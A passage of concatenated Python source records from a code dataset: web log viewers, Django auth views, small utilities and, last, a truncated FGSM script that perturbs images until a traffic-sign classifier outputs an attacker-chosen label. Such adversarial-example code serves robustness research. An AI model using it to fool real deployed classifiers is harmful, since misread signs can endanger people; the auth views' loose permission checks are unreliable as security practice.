[{\"datetime\": datetime.strptime(line[0], '%H:%M:%S %d/%m/%Y'), \n\t\t\t\t\t\"msg\": line[1], \n\t\t\t\t\t\"stacktrace\": line[2],\n\t\t\t\t\t\"error_name\": get_error_name(line[2])} for line in search_result] \n\t# Add a filter if error_name != errors_type, this error not add to result.\n\telse:\n\t\terrors = filter(lambda error: error[\"error_name\"] in kvargs['errors_type'],\n\t\t\t\t\t [{\"datetime\": datetime.strptime(line[0], '%H:%M:%S %d/%m/%Y'), \n\t\t\t\t\t \"msg\": line[1], \n\t\t\t\t\t \"stacktrace\": line[2],\n\t\t\t\t\t \"error_name\": get_error_name(line[2])} for line in search_result])\n\t# Add a filter if error datetime != kvargs['date'], this error not add to result.\n\tif kvargs['date']:\n\t\terrors = filter(lambda error: \n\t\t\terror[\"datetime\"].strftime('%d %m %Y') == kvargs['date'].strftime('%d %m %Y'),\n\t\t\terrors)\n\n\t# Sorting result list by date (early -> late).\n\terrors.sort(key = lambda i: i[\"datetime\"], reverse=True)\n\treturn errors\n\ndef get_list_of_request(full_log, **kvargs):\n\t\"\"\"Return list of request from request.log.\n\n\tKeyword arguments:\n\tfull_log -- string line containing full error.log\n\t**kvargs {\n\t\tip -- string ip adress which interested by user (default \"\" i.e. All)\n\t\trequest_date -- datetime(%Y-%m-%d) date which user enter \n\t\t\t\t\t\tin front (default \"\" i.e. All)\n\t\tsn -- string number of counter which interested \n\t\t\t by user (default \"\" i.e. All)\n\t\tstart_date -- datetime(%Y-%m-%d) date which user \n\t\t\t\t\t enter in front (default \"\" i.e. All)\n\t}\n\tIf any of kvargs == \"\" filter of this mark will not work.\n\n\t\"\"\"\n\tfull_log += \"##\"\n\tsearch_result = re.findall(\n\t\tr'(\\d{2}\\:\\d{2}\\:\\d{2} \\d{2}\\/\\d{2}\\/\\d{4}) \\- (\\d+\\.\\d+\\.\\d+\\.\\d+)\\n(.*?)\\n##', \n\t\tfull_log, re.S)\n\t# Create a list of dictionaries with information \n\t# about request(date, ip, counter info).\n\trequests = [{\"datetime\": datetime.strptime(line[0], '%H:%M:%S %d/%m/%Y'), \n\t\t\t\t\t\"ip\": line[1],\n\t\t\t\t\t\"request_body\": json.loads(line[2])} for line in search_result] \n\n\t# Translate readout_dt \"1465193586\" --> \"2016-06-06\" in all measurments.\t\t\t\t\t\n\tfor request in requests:\n\t\tfor counter in request.get(\"request_body\").get(\"data\"):\n\t\t\tcounter[\"readout_dt\"] = (date.fromtimestamp(int(counter[\"readout_dt\"])))\n\n\t# Add a filter if request ip != kvargs[\"ip\"], this request not add to result.\n\tif kvargs[\"ip\"]:\n\t\trequests = filter(lambda request: request[\"ip\"] == kvargs[\"ip\"], requests)\n\n\t# Add a filter if request[\"datetime\"] != kvargs['request_date'], this error not add to result.\t\n\tif kvargs['request_date']:\n\t\trequests = filter(lambda request: \n\t\t\trequest[\"datetime\"].strftime('%d %m %Y') == kvargs['request_date'].strftime('%d %m %Y'), \n\t\t\trequests)\n\n\t# Add a filter if sn of counter != kvargs[\"sn\"], this request not add to result.\n\tif kvargs['sn']:\n\t\trequests = filter(lambda request: \n\t\t\trequest.get(\"request_body\").get(\"sn\") == kvargs['sn'], requests)\n\n\t# Add a filter if measurment date \"readout_dt\" < kvargs['start_date'], \n\t# this measurment not add to result.\n\tif kvargs['start_date']:\n\t\tfor request in requests:\n\t\t\trequest.get(\"request_body\")[\"data\"] = filter(\n\t\t\t\tlambda item: item[\"readout_dt\"] >= datetime.date(kvargs['start_date']), \n\t\t\t\trequest.get(\"request_body\")[\"data\"])\n\n\t\trequests = filter(lambda request: \n\t\t\tlen(request.get(\"request_body\").get(\"data\")) >= 1, requests)\n\n\t# Sorting result list by date (early -> late).\n\trequests.sort(key = lambda i: i[\"datetime\"], reverse = True)\t\n\treturn requests\n\n@app.route('/')\ndef index():\n\t\"\"\"Render index page\"\"\"\n\treturn render_template('index.html')\n\n@app.route('/datareceiver', methods=['GET','POST'])\ndef datareceiver():\n\t\"\"\"Get data in JSON format from client and add information\n\tabout requset in request.log. Return status: OK if success.\n\n\t\"\"\"\n\tif request.method == 'GET':\n\t\treturn abort(404)\n\tlogger = logging.getLogger('app.views')\n\tlogger.setLevel(logging.INFO)\n\n\tlogger.addHandler(request_file_hendler)\n\tdata = request.get_json()\n\tlogger.info('{}\\n{}'.format(request.remote_addr, \n\t\t\t\t\t\t\t\tjson.dumps(data, encoding=\"ascii\"))) \n\treturn jsonify({'status' : 'OK'}), 200\n\n@app.route('/getlog', methods=['GET','POST'])\ndef getlog():\n\t\"\"\"Return to client render_template of error_log or request_log\n\t1. Get from client what type of log he want's to see (errors or requests).\n\t2. Get list of dictionaries from get_list_of_errors or get_list_of_requset\n\twith emty named arguments.\n\t3. Return to a client html page with content of errors or requests log.\n\n\t\"\"\"\n\tif request.method == 'GET':\n\t\treturn abort(404)\n\t\n\tfilename = get_file_name(request.get_json())\n\twith open(os.path.join(base_dir, filename)) as fd:\n\t\tfull_log = fd.read()\n\n\tif not full_log:\n\t\treturn jsonify({'log':'
', 'control': ''}), 200\n\n\tif filename == app.config['ERROR_LOG_FILE']:\n\t\t# Get list of errors.\n\t\terrors_list = get_list_of_errors(full_log, \n\t\t\t\t\t\t\t\t\t\t errors_type='', \n\t\t\t\t\t\t\t\t\t\t date='')\n\n\t\t# Get list of type of errors in errors.log.\n\t\terror_name_list = list(set([error['error_name'] for error in errors_list]))\n\n\t\treturn jsonify({'log':render_template('errorlog.html', errors=errors_list), \n\t\t\t\t\t\t'control': render_template('error_log_controle.html', \n\t\t\t\t\t\t\t\t\t\t\t\t   error_name_list=error_name_list)})\n\telse:\n\t\t# Get list of requests.\n\t\trequest_list = get_list_of_request(full_log, \n\t\t\t                               ip=\"\", \n\t\t\t                               request_date=\"\", \n\t\t\t                               sn=\"\", \n\t\t\t                               start_date=\"\")\n\t\treturn jsonify({'log':render_template('requestlog.html', \n\t\t\t\t\t\t\t\t\t\t\t   requests=request_list), \n\t\t\t\t\t\t'control': ''})\n\n@app.route('/errorlogfilter', methods=['GET','POST'])\ndef errorlogfilter():\n\t\"\"\"Return to client render_template of error_log with user filters:\n\tMethod get JSON: {\n\t\t\"errors\" : string errors separeted by ' ' or empty string (i.e. all type)\n\t\t\"date\" : string (yyyy-mm-dd) choice by user(for filter)\n\t}\n\n\t\"\"\"\n\tif request.method == 'GET':\n\t\treturn abort(404)\n\telse:\n\t\tdata = request.get_json()\n\t\tif data[\"errors\"]:\n\t\t\terrors = data[\"errors\"].split()\n\t\telse:\n\t\t\terrors = data[\"errors\"]\n\n\t\tdate = get_date(data[\"date\"])\n\n\t\twith open(os.path.join(base_dir, app.config['ERROR_LOG_FILE'])) as fd:\n\t\t\tfull_log = fd.read()\n\t\t# If log is empty return empty response.\n\t\tif not full_log:\n\t\t\treturn jsonify({'log':'
'}), 200\n\t\t# Get filtered errosr_list.\n\t\terrors_list = get_list_of_errors(full_log, errors_type=errors, date=date)\n\t\terror_name_list = list(set([error['error_name'] for error in errors_list]))\t\n\n\treturn jsonify({'log':render_template('errorlog.html', errors=errors_list), \n\t\t\t\t\t'control': render_template('error_log_controle.html', \n\t\t\t\t\t\t\t\t\t\t\t   error_name_list=error_name_list)})\n\ndef get_date(date):\n\t\"\"\"Translation string date -> datetime date or return empty string\"\"\"\n\tif date:\n\t\treturn datetime.strptime(date, '%Y-%m-%d')\n\treturn date\n\n@app.route('/requestlogfilter', methods=['GET','POST'])\ndef requestlogfilter():\n\t\"\"\"Return to client render_template of request_log with user filters:\n\tMethod get JSON: {\n\t\t\"ip\" : string ip choice by user(for filter)\n\t\t\t   or empty string (i.e. all ips)\n\t\t\"request_date\" : string (yyyy-mm-dd) request date choice \n\t\t\t\t\t\t by user(for filter) or empty string \n\t\t\t\t\t\t (i.e. all date)\n\t\t\"sn\" : string counter number choice by user(for filter)\n\t\t\t   or empty string (i.e. all sns)\n\t\t\"start_date\" : string (yyyy-mm-dd) request date choice \n\t\t\t\t\t   by user(for filter) later that date \n\t\t\t\t\t   measurment add in result or empty string \n\t\t\t\t\t   (i.e. all date)\n\t}\n\n\t\"\"\"\n\tif request.method == 'GET':\n\t\treturn abort(404)\n\t\n\tdata = request.get_json()\n\trequest_date = get_date(data[\"request_date\"])\n\tstart_date = get_date(data[\"start_date\"])\n\n\twith open(os.path.join(base_dir, \n\t\t\t\t\t\t   app.config['REQUEST_LOG_FILE'])) as fd:\n\t\tfull_log = fd.read()\n\t# If log is empty return empty response.\n\tif not full_log:\n\t\treturn jsonify({'log':'
'}), 200\n\t# Get filtered request_list.\n\trequest_list = get_list_of_request(full_log, \n\t\t\t\t\t\t\t\t\t   ip=data[\"ip\"], \n\t\t\t\t\t\t\t\t\t   request_date=request_date, \n\t\t\t\t\t\t\t\t\t   sn=data[\"sn\"], \n\t\t\t\t\t\t\t\t\t   start_date=start_date) \n\n\treturn jsonify({'log':render_template('requestlog.html', \n\t\t\t\t\t\t\t\t\t\t  requests=request_list)})","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"494035896","text":"import json\n\nfrom django.conf import settings\nfrom django.contrib import auth\nfrom django.contrib.auth.models import AnonymousUser, User\nfrom homados.contrib.cache import ConfigCache\nfrom homados.contrib.exceptions import MissParamError\nfrom homados.contrib.mymixins import PackResponseMixin\nfrom libs.utils import get_user_ident, report_auth_event\nfrom rest_framework import exceptions, filters, status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom .models import Log\nfrom .serializers import LogSerializer, UserRegisterSerializer, UserSerializer\n\n# 平台运行时配置\nruntime_config = ConfigCache()\n\n\nclass AuthViewSet(PackResponseMixin, viewsets.ModelViewSet):\n    \"\"\"auth viewset\"\"\"\n    queryset = User.objects.all()\n    serializer_class = UserSerializer\n    permission_classes = [IsAuthenticated]\n\n    @action(methods=[\"POST\"], detail=False, url_path=\"register\", permission_classes=[])\n    def register(self, request, *args, **kwargs):\n        if runtime_config.get('close_register'):\n            raise exceptions.ValidationError(detail={'detail': '该平台已关闭注册'})\n        serializer = UserRegisterSerializer(data=request.data)\n        serializer.is_valid(raise_exception=True)\n        user = serializer.save()\n        report_auth_event(f\"{get_user_ident(user)} 注册成功\")\n        return Response(serializer.data, status=status.HTTP_201_CREATED)\n    \n    @action(methods=[\"POST\"], detail=False, url_path=\"login\", permission_classes=[])\n    def login(self, request, *args, **kwargs):\n        serializer = self.get_serializer(data=request.data)\n        user = auth.authenticate(request, username=serializer.initial_data[\"username\"], password=serializer.initial_data[\"password\"])\n        if not user:\n            raise exceptions.PermissionDenied(detail='账号或密码错误')\n        auth.login(request, user)\n        serializer = self.get_serializer(user)\n        report_auth_event(f\"{get_user_ident(user)} 登录平台\")\n        return Response({**serializer.data, 'token': request.session.session_key})\n    \n    @action(methods=[\"DELETE\"], detail=False, url_path=\"logout\")\n    def logout(self, request, *args, **kwargs):\n        auth.logout(request)\n        report_auth_event(f\"{get_user_ident(request.user)} 登出平台\")\n        return Response('登出平台成功')\n    \n    @action(methods=[\"GET\"], detail=False, url_path=\"info\")\n    def info(self, request, *args, **kwargs):\n        data = {}\n        data['roles'] = ['admin'] if request.user.is_staff else ['user']\n        serializer = self.get_serializer(request.user)\n        report_auth_event(f\"{get_user_ident(request.user)} 进入平台\")\n        data['close_register'] = runtime_config.get('close_register', False)\n        data.update(serializer.data)\n        return Response(data)\n\n    def list(self, request):\n        queryset = User.objects.all()\n        serializer = UserSerializer(queryset, many=True)\n        return Response(serializer.data)\n\n    def destroy(self, request, *args, **kwargs):\n        instance = self.get_object()\n        self.perform_destroy(instance)\n        return Response(data={'detail': f'{instance.username} 删除成功'})\n    \n    def update(self, request, *args, **kwargs):\n        try:\n            user = User.objects.get(username=self.get_object())\n            if(request.data['password']==request.data['confirm_password']):\n                user.set_password(request.data.get('password'))\n                user.save()\n                return Response({'detail': '修改密码成功'})\n            else:\n                return Response({'detail': 'The two password inputs are not the same'})\n        except KeyError as e:\n            raise MissParamError(query_params=[str(e)])\n\n\n    @action(methods=[\"PATCH\"], detail=False, url_path=\"switchRegister\")\n    def switch_register(self, request, *args, **kwargs):\n        try:\n            is_close_register = bool(request.data['close'])\n            runtime_config.set('close_register', is_close_register, None)\n            msg = '关闭' if is_close_register else '打开'\n            report_auth_event(f\"{get_user_ident(request.user)} {msg}注册\")\n            return Response({'detail': '设置成功'})\n        except KeyError as e:\n            raise MissParamError(query_params=['close'])\n\n\nclass LogViewSet(PackResponseMixin, viewsets.ReadOnlyModelViewSet):\n    queryset = Log.objects.all()\n    serializer_class = LogSerializer\n    permission_classes = [IsAuthenticated]\n    filter_backends = [filters.SearchFilter, filters.OrderingFilter]\n    search_fields = ['info', 'ltype']\n","sub_path":"homados/apps/userauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"113599796","text":"#!/usr/bin/python\n\n# Script to keep track of the time I spend telecommuting.\nimport os\nimport time\n\n# Change to the clock_in log directory.\nos.chdir('LOG_DIR')\n\n# Get the local time.\nlocal_time = time.localtime()\n\n# Determine the log file name and open it.\norig_day = '{}-{:02}-{:02}'.format(local_time.tm_year,local_time.tm_mon,local_time.tm_mday)\nlog_file = open(orig_day + '.log','a')\n\n# Function to log the given message to the current log file.\ndef log_message(message):\n\tglobal log_file, orig_day\n\n\t# Get the local time.\n\tlocal_time = time.localtime()\n\t# Make sure it is the same day as the day that the script was started.\n\ttoday = '{}-{:02}-{:02}'.format(local_time.tm_year,local_time.tm_mon,local_time.tm_mday)\n\tif today != orig_day:\n\t\tlog_file.write('Continued on '+today+'\\n')\n\t\tlog_file.close()\n\t\tlog_file = open(today + '.log','w')\n\t\tlog_file.write('Continued from '+orig_day)\n\t\torig_day = today\n\n\t# Determine the log prefix.\n\tlog_prefix = '{:02}:{:02}:{:02}| '.format(local_time.tm_hour,local_time.tm_min,local_time.tm_sec)\n\n\t# Write to the log file.\n\tlog_file.write(log_prefix+message+'\\n')\n\n# Clock in.\nlog_message('Clocking in')\n\n# Determine the prompt string.\nprompt_string = '> '\n\n# Continuously collect user input.\ntry:\n\twhile True:\n\t\t# Prompt the user for an entry.\n\t\tline = raw_input(prompt_string)\n\n\t\tif line.lower() == 'clock out':\n\t\t\tlog_message('Clocking out\\n')\n\t\t\tbreak\n\n\t\tlog_message(line)\n\t\nexcept EOFError:\n\tlog_message('Clocking out\\n')\n\t# Exit on EOF.\n\tprint\n\nlog_file.close()\n","sub_path":"clock_in.py","file_name":"clock_in.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"132387815","text":"import os\nimport json\n\nfrom sensoragent.exceptions.errors import  *\n\nclass Config:\n\n    def __init__(self):\n        try:\n            self.config_file = os.environ['BAR_CONFIG']\n            self.map_data = None\n            self.targets = None\n        except(KeyError):\n            raise VariableMissingError(\"Variable BAR_CONFIG missing\")\n\n    def load_resources(self):\n        if not os.path.isfile(self.config_file):\n            raise InvalidConfigFileError(\"Invalid config file\")\n        self.map_data = json.load(open(self.config_file))\n\n    def get_target(self):\n        if self.map_data == None:\n            raise InvalidStateError(\"Resources should be load before. Use load_resources method before running it.\")\n        \n        return self.map_data['target']\n\n    def get_aggregate(self):\n        if self.map_data == None:\n            raise InvalidStateError(\"Resources should be load before. Use load_resources method before running it.\")\n\n        return self.map_data['aggregate']\n","sub_path":"agents/SensorAgent/sensoragent/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"166346324","text":"#!/usr/bin/env python\n# tag-exif.py\nimport os, sys, time\nfrom exif import Image\n\ndef tagExif(parentFolder):\n  for dirName, subdirs, fileList in os.walk(parentFolder):\n    for filename in fileList:\n\n      if ((len(filename)>1) and (filename[0:2]=='x_')):\n        print(\"SKIPPING %s\" %filename)\n        continue\n\n      sp =filename.split('.')\n      if (len(sp) < 2):\n        print(\"NO EXT for %s\" %filename)\n        continue\n\n      ext = sp[-1].lower()\n      if not (ext in ['jpg']):\n        print(\"SKIP EXT %s for %s\" % (ext, filename))\n        continue\n\n      path = os.path.join(dirName, filename)\n      with open(path, 'rb') as image_file:\n        my_image = Image(image_file)\n\n      if (hasattr(my_image, 'has_exif') and my_image.has_exif and hasattr(my_image, 'datetime')):\n        dt = my_image.datetime.replace(':','-').replace(' ', '_T')\n      else:\n        dt = '0000-00-00_T00-00-00'\n\n      # initialize and strip unwanted characters\n      new_filename = filename.replace('=','-').replace(\"'\", '').replace('#', '').replace('&','').replace(',', '_').replace(' ', '_')\n      # consolidate multiple underscores to single underscore\n      new_filename = 'x_' + dt + ' ' +'_'.join(filter(None,new_filename.split('_')))\n      print(new_filename)\n      new_path = os.path.join(dirName, new_filename)\n      os.rename(path, new_path)\n\n  return\n\nif __name__ == '__main__':\n    if len(sys.argv) > 1:\n        folders = sys.argv[1:]\n        for i in folders:\n            # Iterate the folders given\n            if os.path.exists(i):\n                # Find the duplicated files and append them to the dups\n                tagExif(i)\n            else:\n                print('%s is not a valid path, please verify' % i)\n                sys.exit()\n    else:\n        print('Usage: python exif-tag.py folder or python exif-tag.py folder1 folder2 folder3')","sub_path":"exif-tag.py","file_name":"exif-tag.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"196958337","text":"import numpy as np\n\ndef fun_dAX(X, Xu1, Xd1, Xd2, Xleft1, hX, eyeD, eyeDleft2, eyeDleft1, eyeDright1, D, dim_obs, M, Y, dt, Rm, Rf, scaling):\n    \n    GXterm1 = np.multiply(eyeDleft1[:,:,None], np.transpose(Xu1[:,:,None] - Xd2[:,:,None],(0,2,1)))\n    GXterm2 = np.multiply(eyeDright1[:,:,None] - eyeDleft2[:,:,None], np.transpose(Xd1[:,:,None], (0,2,1)))\n    GX = GXterm1 + GXterm2 - eyeD[:,:,None]\n    \n    kern2 = np.multiply(np.transpose(X[:,:,None] - np.roll(hX, 1, 1)[:,:,None], (0, 2, 1)), eyeD[:,:,None] - dt/2*GX)\n    kern2 = Rf/M*np.transpose(np.sum(kern2,0)[None,:,:], (1,2,0))[:,:,0]\n    kern2[:,0] = 0\n\n    kern3 = np.multiply(np.transpose(Xleft1[:,:,None]-hX[:,:,None], (0,2,1)), eyeD[:,:,None] + dt/2*GX)\n    kern3 = -Rf/M*np.transpose(np.sum(kern3,0)[None,:,:], (1,2,0))[:,:,0]\n    kern3[:,-1] = 0\n    \n    kern1 = np.zeros(shape=(D,M))\n    kern1[dim_obs,:] = Rm/M*(X[dim_obs,:] - Y)\n\n    dAX = scaling * (kern1 + kern2 + kern3)\n    \n    return dAX","sub_path":"fun_dAX.py","file_name":"fun_dAX.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"412616795","text":"from django.shortcuts import redirect\nfrom django.urls import reverse\n\n\nclass UserPermissionMiddleware:\n\n    def __init__(self, get_response):\n        self.get_response = get_response\n\n    def __call__(self, request):\n        response = self.get_response(request)\n        return response\n\n    def process_view(self, request, *args):\n        try:\n            pk = args[2]['pk']\n        except:\n            pk = 1\n        urls = (\n            reverse('logout'),\n            reverse('animal_list'),\n            reverse('animal_detail', kwargs={'pk': pk}),\n            reverse('add_animal'),\n            reverse('edit_animal', kwargs={'pk': pk}),\n            reverse('med_list', kwargs={'pk': pk}),\n            reverse('api_med'),\n            reverse('med_detail', kwargs={'pk': pk}),\n            reverse('med_add'),\n        )\n\n        volunteer_urls = urls[:2]\n        employee_urls = urls[:4]\n        manager_urls = urls[:4]\n        director_urls = urls[:6]\n        vet_urls = urls[:]\n        admin_urls = urls[:]\n\n        user_perms = {\n            'volunteer': volunteer_urls,\n            'employee': employee_urls,\n            'manager': manager_urls,\n            'director': director_urls,\n            'vet': vet_urls,\n            'admin': admin_urls,\n        }\n\n        try:\n            latitude = args[2]['latitude']\n            longtitude = args[2]['longtitude']\n        except:\n            longtitude = None\n            latitude = None\n\n        free_access_urls = (\n            reverse('api_comments'),\n            reverse('api_animals'),\n            reverse('api_animals2', kwargs={'latitude': latitude, 'longtitude': longtitude}),\n            reverse('login'),\n            '/admin/',\n        )\n\n        if request.path in free_access_urls:\n            return None\n        else:\n            if request.user.is_authenticated:\n                try:\n                    if request.path not in user_perms[request.user.position]:\n                        return redirect('animal_list')\n                    else:\n                        return None\n                except:\n                    return redirect('animal_list')\n            else:\n                return redirect('login')\n","sub_path":"animals/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"2259681","text":"# -*- coding: utf-8 -*-\n# Copyright (c) St. Anne's University Hospital in Brno. International Clinical\n# Research Center, Biomedical Engineering. All Rights Reserved.\n# Distributed under the (new) BSD License. See LICENSE.txt for more info.\n\n# Std imports\n\n# Third pary imports\nimport numpy as np\nimport scipy.signal as sp\n\n# Local imports\nfrom ..utils.method import Method\n\n\ndef compute_mi_count(data, nbins=18):\n    \"\"\"\n    Function to compute modulation index (MI) of given data\n\n    Parameters\n    ----------\n    data: numpy.ndarray\n        data from which MI is computed\n    nbins: int\n        number of bins in which data will be separated, can affecct the result, default is 18\n\n    Returns\n    -------\n    MI: float64\n        modulation index computed as KL/np.log(nbins)\n\n    Example\n    -------\n    MI = compute_mi_count(data)\n\n    \"\"\"\n\n    size = 2 * np.pi / nbins\n    position = np.zeros(nbins)\n    mean_amp = np.zeros(nbins)\n\n    # Binning the phases\n    for bins in range(0, nbins):\n        position[bins] = -np.pi + bins * size\n\n    f_data = sp.hilbert(data)\n    ampl = np.abs(f_data)\n    ph = np.angle(f_data)\n\n    # Computing average amplitude\n    for j in range(0, nbins):\n        phases1 = ampl[np.where(position[j] <= ph)]\n        phases2 = ampl[np.where(ph < position[j] + size)]\n        phases = np.intersect1d(phases1, phases2)\n        mean_amp[j] = np.mean(phases)\n\n    # Normalizing amplitude\n    p = mean_amp / np.sum(mean_amp)\n\n    # Computing Shannon entropy\n    H = -np.sum(p * np.log(p))\n\n    # Computing Kullback–Leibler distance\n    KL = np.log(nbins) - H\n\n    return KL / np.log(nbins)\n\n\nclass ModulationIndex(Method):\n\n    algorithm = 'MODULATION_INDEX'\n    algorithm_type = 'univariate'\n    version = '1.0.0'\n    dtype = [('mi', 'float32')]\n\n    def __init__(self, **kwargs):\n        \"\"\"\n        Modulation Index\n\n        Parameters\n        ----------\n        data: numpy.ndarray\n            data from which MI is computed\n        nbins: int\n            number of bins in which data will be separated, can affecct the result, default is 18\n        \"\"\"\n\n        super().__init__(compute_mi_count, **kwargs)\n","sub_path":"epycom/univariate/modulation_index.py","file_name":"modulation_index.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"611463022","text":"#!/usr/bin/python\ndef f1(x, y=0):\n    wynik = x*x+y\n    return wynik\n\ndef f2(x):\n    if len(x)==0:  \n        return 'BUUUUM'\n    else:        \n        return x[0]\n\ndef f3(x):        \n    return {\n        1: \"jeden\",\n        2: \"dwa\",\n        3: \"trzy\",\n        }.get(x,'other')\n\ndef f4(x, y=''):\n    mk=' ma kota'\n    i = ''\n    if y!='':\n        i = ' i ' + y\n    return x + mk + i \n    \n    ","sub_path":"adam/wroc.py","file_name":"wroc.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"279876394","text":"from core.helpers import try_convert\nfrom core.logger import Logger\n\nfrom plex.objects.library.metadata.episode import Episode\nfrom plex.objects.library.metadata.movie import Movie\nfrom plex.objects.library.metadata.show import Show\nfrom plex_metadata import Guid, Matcher\n\nlog = Logger('core.action')\n\n\nclass PlexHelper(object):\n    @staticmethod\n    def get_root(p_item):\n        if isinstance(p_item, Episode):\n            return p_item.show\n\n        return p_item\n\n    @classmethod\n    def to_trakt(cls, key, p_item, guid=None, year=None, strict=True):\n        data = {}\n\n        if type(p_item) is Episode:\n            data['number'] = key\n\n        if type(p_item) is Movie or type(p_item) is Show:\n            p_root = cls.get_root(p_item)\n\n            data['title'] = p_root.title\n\n            if year:\n                data['year'] = year\n            elif p_root.year is not None:\n                data['year'] = p_root.year\n            elif p_item.year is not None:\n                data['year'] = p_item.year\n\n            # Set identifier on movie/show objects\n            return ActionHelper.set_identifier(data, guid or p_root.guid, strict=strict)\n\n        return data\n\n\nclass TraktHelper(object):\n    @classmethod\n    def episodes(cls, episodes):\n        result = []\n\n        for episode in episodes:\n            _, episodes = Matcher.process(episode)\n\n            for episode_num in episodes:\n                result.append({\n                    'number': episode_num\n                })\n\n        return result\n\n\nclass ActionHelper(object):\n    plex = PlexHelper\n    trakt = TraktHelper\n\n    @classmethod\n    def set_identifier(cls, data, guid, strict=True):\n        if not guid:\n            return None\n\n        if type(guid) is str:\n            # Parse raw guid\n            guid = Guid.parse(guid)\n\n        if 'ids' not in data:\n            data['ids'] = {}\n\n        ids = data['ids']\n\n        if guid.agent == 'imdb':\n            ids['imdb'] = guid.sid\n        elif guid.agent == 'tmdb':\n            ids['tmdb'] = try_convert(guid.sid, int)\n        elif guid.agent == 'tvdb':\n            ids['tvdb'] = try_convert(guid.sid, int)\n        elif not strict:\n            log.info('Unknown Guid agent: \"%s\"', guid.agent)\n        else:\n            log.info('Unknown Guid agent: \"%s\" [strict]', guid.agent)\n            return None\n\n        return data\n","sub_path":"Trakttv.bundle/Contents/Code/core/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"175910197","text":"from nltk.tokenize import word_tokenize as wt\nfrom nltk import pos_tag, RegexpParser\nfrom feature_extraction.linguistic.utils import reshape_vector, reshape_matrix\n\ndef phrase_freq(tags, parser, shape):\n    phrases = []\n    for tagged in tags:\n        chunks = parser.parse(tagged)\n        for sub in chunks.subtrees(filter=lambda t: t.label() == 'PHRASES'):\n            phrases.append(' '.join([i[0] for i in sub]))\n    freq = [phrases.count(p) / len(phrases) for p in phrases]\n    return reshape_matrix(freq, shape, shape)\n\ndef get_syntactic_features(sentences, shape):\n    tags = [pos_tag(words) for words in [wt(sent) for sent in sentences]]\n    parser = RegexpParser('''\n                        PHRASES: {
* +}\n ''')\n return phrase_freq(tags, parser, shape)\n","sub_path":"feature_extraction/linguistic/syntactic.py","file_name":"syntactic.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"99688295","text":"from typing import List\nclass Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n count = 0\n for i in range(len(nums)):\n if (nums[i]!=0):\n nums[count] = nums[i]\n count+=1\n while(count< len(nums) ):\n nums[count]=0\n count+=1\n print(nums)\n\nsol = Solution()\narr = [0,1,0,3,12]\nsol.moveZeroes(arr)\n ","sub_path":"week-1/movezeros.py","file_name":"movezeros.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"30371331","text":"import numpy as np\nimport cv2\nfrom torch import nn\nimport torch\nfrom torch.autograd import Variable\nfrom stn_cnn import StnCnn\nfrom PIL import Image\nfrom argparse import ArgumentParser\nimport torchvision.utils\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\n\nlabels = ['i2', 'i4', 'i5', 'io', 'ip', 'p11', 'p23', 'p26', 'p5', 'pl30',\n 'pl40', 'pl5', 'pl50', 'pl60', 'pl80', 'pn', 'pne', 'po', 'w57']\n\n\ndef getindex(label):\n for i in range(len(labels)):\n if labels[i] == label:\n return i\n return 0\n\n\ndef imshow(img, title, save):\n npimg = img.cpu().numpy()\n fig = plt.figure(figsize=(5, 5))\n plt.imshow(np.transpose(npimg, (1, 2, 0)))\n \n if save:\n plt.axis('off')\n plt.savefig('../attack/' + title, bbox_inches='tight', pad_inches = 0)\n \n plt.title(title)\n plt.show()\n\n\ndef fgsm_targeted_attack(model, file_name, img_input, origin_label, target_label):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n imshow(torchvision.utils.make_grid(img_input, normalize=True), args.test_file, False)\n\n target_label_as_var = Variable(torch.from_numpy(np.asarray([target_label])))\n target_label_as_var = target_label_as_var.to(device)\n loss = nn.CrossEntropyLoss()\n img_input.requires_grad = True\n\n for i in range(1000):\n print('Iteration:', str(i))\n img_input.grad = None\n output = model(img_input)\n cost = loss(output, target_label_as_var)\n cost.backward()\n img_input.data = img_input.data - 0.3 * torch.sign(img_input.grad.data)\n\n attack_output = model(img_input)\n\n index = int(torch.argmax(attack_output))\n print('The prediction is: ' + labels[index])\n\n if int(torch.argmax(attack_output)) == target_label:\n targeted_name = file_name + \"_from_\" + labels[origin_label] + \"_to_\" + labels[target_label] + \".png\"\n imshow(torchvision.utils.make_grid(img_input, normalize=True).detach(), targeted_name, True)\n break\n \n return 1\n\n\ndef main(args):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model: StnCnn = StnCnn.load_from_checkpoint(args.checkpoint)\n model.to(device)\n model.eval()\n\n transform = transforms.Compose(\n [transforms.Resize((48, 48)),\n transforms.ToTensor(),\n transforms.Normalize((0.440985, 